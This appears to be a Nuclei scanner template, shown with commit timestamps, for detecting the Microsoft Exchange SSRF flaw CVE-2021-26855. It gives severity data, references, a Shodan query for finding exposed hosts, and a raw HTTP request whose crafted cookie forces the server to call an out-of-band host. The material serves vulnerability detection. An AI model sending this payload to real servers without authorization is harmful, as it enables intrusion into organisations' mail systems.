2021-03-06 07:00:59 +00:00
id : CVE-2021-26855
info :
2022-02-04 16:13:25 +00:00
name : Microsoft Exchange Server SSRF Vulnerability
2021-03-06 07:00:59 +00:00
author : madrobot
severity : critical
2022-05-17 09:18:12 +00:00
description : This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
2023-09-06 12:09:01 +00:00
remediation : Apply the appropriate security update.
2021-08-18 11:37:49 +00:00
reference :
2022-02-04 16:13:25 +00:00
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
2021-08-19 14:44:46 +00:00
- https://proxylogon.com/#timeline
2022-07-01 10:02:07 +00:00
- https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
2021-08-19 14:44:46 +00:00
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
2023-07-11 19:49:27 +00:00
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26855
2023-07-11 19:49:27 +00:00
cwe-id : CWE-918
2023-10-22 12:16:24 +00:00
epss-score : 0.97494
2023-10-25 06:44:12 +00:00
epss-percentile : 0.99971
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
2022-07-03 15:33:28 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microsoft
product : exchange_server
2023-09-06 12:09:01 +00:00
shodan-query : vuln:CVE-2021-26855
2022-07-21 17:18:22 +00:00
tags : cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev
2021-03-06 07:34:26 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-06 07:00:59 +00:00
- raw :
- |
GET /owa/auth/x.js HTTP/1.1
Host : {{Hostname}}
2021-08-12 15:54:09 +00:00
Cookie : X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
2021-03-06 07:00:59 +00:00
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-03-06 07:00:59 +00:00
words :
2022-02-04 16:13:25 +00:00
- "http"
2023-10-25 12:04:43 +00:00
# digest: 4b0a00483046022100b38b39cef84ddf66fe92ef350ceb7b5d1b69cf1c64f542854a74ee2c4dc1b1c6022100dc5952e4bc3368b5eff5515397eb9d9c444cdac733cd6b4a730c4cbf8186496a:922c64590222798bb761d5b6d8e72950